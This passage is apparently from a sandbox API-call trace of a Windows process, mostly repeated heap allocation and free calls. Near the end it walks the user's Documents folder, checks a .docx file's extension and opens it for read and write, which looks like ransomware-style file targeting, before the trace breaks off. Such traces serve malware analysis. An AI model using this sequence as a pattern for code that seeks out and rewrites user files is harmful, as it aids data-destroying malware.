Flags=0x0, Size=0x60) returned 0x316d3c8 [0094.850] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0094.850] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0094.850] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d3c8 | out: hHeap=0x680000) returned 1 [0094.850] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d3c8 [0094.850] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0094.850] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0094.850] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d3c8 | out: hHeap=0x680000) returned 1 [0094.850] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d3c8 [0094.850] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0094.850] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0094.850] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d3c8 | out: hHeap=0x680000) returned 1 [0094.850] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d3c8 [0094.850] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0094.850] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f05a0 [0094.850] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0094.851] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0094.851] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d3c8 | out: hHeap=0x680000) returned 1 [0094.851] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d3c8 [0094.851] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0094.851] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0094.851] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d3c8 | out: hHeap=0x680000) returned 1 [0094.851] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d3c8 [0094.851] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0094.851] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99f05a0 [0094.851] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0094.851] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0094.851] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d3c8 | out: hHeap=0x680000) returned 1 [0094.851] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d3c8 [0094.851] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0094.851] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0094.851] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d3c8 | out: hHeap=0x680000) returned 1 [0094.851] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d3c8 [0094.851] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0094.851] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0094.851] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d3c8 | out: hHeap=0x680000) returned 1 [0094.851] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d3c8 [0094.851] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0094.852] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0094.852] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d3c8 | out: hHeap=0x680000) returned 1 [0094.852] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d3c8 [0094.852] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0094.852] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0094.852] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d3c8 | out: hHeap=0x680000) returned 1 [0094.852] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d3c8 [0094.852] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0094.852] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f05a0 [0094.852] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0094.852] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0094.852] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d3c8 | out: hHeap=0x680000) returned 1 [0094.852] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d3c8 [0094.852] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0094.852] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0094.852] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d3c8 | out: hHeap=0x680000) returned 1 [0094.852] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d3c8 [0094.852] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0094.852] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0094.852] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d3c8 | out: hHeap=0x680000) returned 1 [0094.853] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d3c8 [0094.853] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0094.853] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0094.853] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d3c8 | out: hHeap=0x680000) returned 1 [0094.853] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d3c8 [0094.853] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0094.853] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0094.853] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d3c8 | out: hHeap=0x680000) returned 1 [0094.853] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d3c8 [0094.853] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0094.853] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0094.853] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d3c8 | out: hHeap=0x680000) returned 1 [0094.853] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d3c8 [0094.853] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0094.853] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0094.853] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d3c8 | out: hHeap=0x680000) returned 1 [0094.853] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d3c8 [0094.853] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0094.853] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0094.853] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d3c8 | out: hHeap=0x680000) returned 1 [0094.853] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d3c8 [0094.854] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0094.854] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0094.854] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d3c8 | out: hHeap=0x680000) returned 1 [0094.854] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d3c8 [0094.854] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0094.854] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0094.854] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d3c8 | out: hHeap=0x680000) returned 1 [0094.854] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d3c8 [0094.854] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0094.854] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f05a0 [0094.854] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0094.854] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0094.854] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d3c8 | out: hHeap=0x680000) returned 1 [0094.854] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d3c8 [0094.854] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0094.854] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0094.854] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d3c8 | out: hHeap=0x680000) returned 1 [0094.854] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d3c8 [0094.854] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0094.854] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0094.854] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d3c8 | out: hHeap=0x680000) returned 1 [0094.855] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d3c8 [0094.855] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0094.855] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0094.855] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d3c8 | out: hHeap=0x680000) returned 1 [0094.855] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d3c8 [0094.855] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0094.855] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0094.855] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d3c8 | out: hHeap=0x680000) returned 1 [0094.855] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d3c8 [0094.855] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0094.855] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0094.855] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d3c8 | out: hHeap=0x680000) returned 1 [0094.855] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d3c8 [0094.855] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0094.855] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f05a0 [0094.855] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0094.855] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0094.855] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d3c8 | out: hHeap=0x680000) returned 1 [0094.855] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d3c8 [0094.855] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0094.856] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0094.856] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d3c8 | out: hHeap=0x680000) returned 1 [0094.856] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d3c8 [0094.856] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0094.856] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0094.856] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d3c8 | out: hHeap=0x680000) returned 1 [0094.856] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d3c8 [0094.856] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0094.856] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0094.856] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d3c8 | out: hHeap=0x680000) returned 1 [0094.856] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d3c8 [0094.856] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0094.856] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0094.856] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d3c8 | out: hHeap=0x680000) returned 1 [0094.856] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d3c8 [0094.856] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0094.856] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0094.856] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d3c8 | out: hHeap=0x680000) returned 1 [0094.856] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d3c8 [0094.856] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0094.856] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0094.857] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d3c8 | out: hHeap=0x680000) returned 1 [0094.857] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d3c8 [0094.857] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0094.857] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0094.857] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d3c8 | out: hHeap=0x680000) returned 1 [0094.857] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d3c8 [0094.857] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0094.857] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0094.857] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d3c8 | out: hHeap=0x680000) returned 1 [0094.857] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d3c8 [0094.857] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0094.857] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0094.857] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d3c8 | out: hHeap=0x680000) returned 1 [0094.857] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d3c8 [0094.857] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0094.857] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f05a0 [0094.857] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0094.857] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0094.857] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d3c8 | out: hHeap=0x680000) returned 1 [0094.857] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d3c8 [0094.857] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0094.858] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0094.858] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d3c8 | out: hHeap=0x680000) returned 1 [0094.858] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d3c8 [0094.858] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0094.858] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0094.858] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d3c8 | out: hHeap=0x680000) returned 1 [0094.858] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d3c8 [0094.858] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0094.858] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0094.858] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d3c8 | out: hHeap=0x680000) returned 1 [0094.858] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d3c8 [0094.858] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0094.858] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0094.858] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d3c8 | out: hHeap=0x680000) returned 1 [0094.858] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d3c8 [0094.858] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0094.858] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0094.858] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d3c8 | out: hHeap=0x680000) returned 1 [0094.858] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d3c8 [0094.858] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0094.858] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f05a0 [0094.858] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0094.858] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0094.858] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d3c8 | out: hHeap=0x680000) returned 1 [0094.858] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d3c8 [0094.859] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0094.859] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0094.859] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d3c8 | out: hHeap=0x680000) returned 1 [0094.859] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d3c8 [0094.859] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0094.859] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0094.859] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d3c8 | out: hHeap=0x680000) returned 1 [0094.859] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d3c8 [0094.859] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0094.859] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0094.859] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d3c8 | out: hHeap=0x680000) returned 1 [0094.859] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d3c8 [0094.859] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0094.859] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0094.859] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d3c8 | out: hHeap=0x680000) returned 1 [0094.859] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d3c8 [0094.859] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0094.859] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0094.859] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d3c8 | out: hHeap=0x680000) returned 1 [0094.859] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d3c8 [0094.859] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0094.859] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0094.859] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d3c8 | out: hHeap=0x680000) returned 1 [0094.859] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d3c8 [0094.859] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0094.859] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0094.860] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3fe8 [0094.860] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d3c8 | out: hHeap=0x680000) returned 1 [0094.860] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0094.860] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3f40 [0094.860] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0094.860] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0094.860] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d3fe8 | out: hHeap=0x680000) returned 1 [0094.860] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0094.860] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0094.860] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0094.860] PathFindFileNameW (pszPath="") returned="" [0094.860] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d3c8 [0094.860] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x9f914cd0, ftLastAccessTime.dwHighDateTime=0x1d5c60a, ftLastWriteTime.dwLowDateTime=0x9f914cd0, ftLastWriteTime.dwHighDateTime=0x1d5c60a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31c7500 [0094.860] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d3c8 | out: hHeap=0x680000) returned 1 [0094.860] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x9f914cd0, ftLastAccessTime.dwHighDateTime=0x1d5c60a, ftLastWriteTime.dwLowDateTime=0x9f914cd0, ftLastWriteTime.dwHighDateTime=0x1d5c60a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0094.860] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ea259f0, ftCreationTime.dwHighDateTime=0x1d579db, ftLastAccessTime.dwLowDateTime=0x381b76e0, ftLastAccessTime.dwHighDateTime=0x1d5454d, ftLastWriteTime.dwLowDateTime=0x381b76e0, ftLastWriteTime.dwHighDateTime=0x1d5454d, nFileSizeHigh=0x0, nFileSizeLow=0x919f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7DRI_.docx", cAlternateFileName="7DRI_~1.DOC")) returned 1 [0094.860] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d3c8 [0094.860] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8e) returned 0x31b41c0 [0094.860] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d3c8 | out: hHeap=0x680000) returned 1 [0094.861] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\7DRI_.docx") returned=".docx" [0094.861] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\7DRI_.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\7dri_.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0094.861] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=37279) returned 1 [0094.861] VirtualAlloc 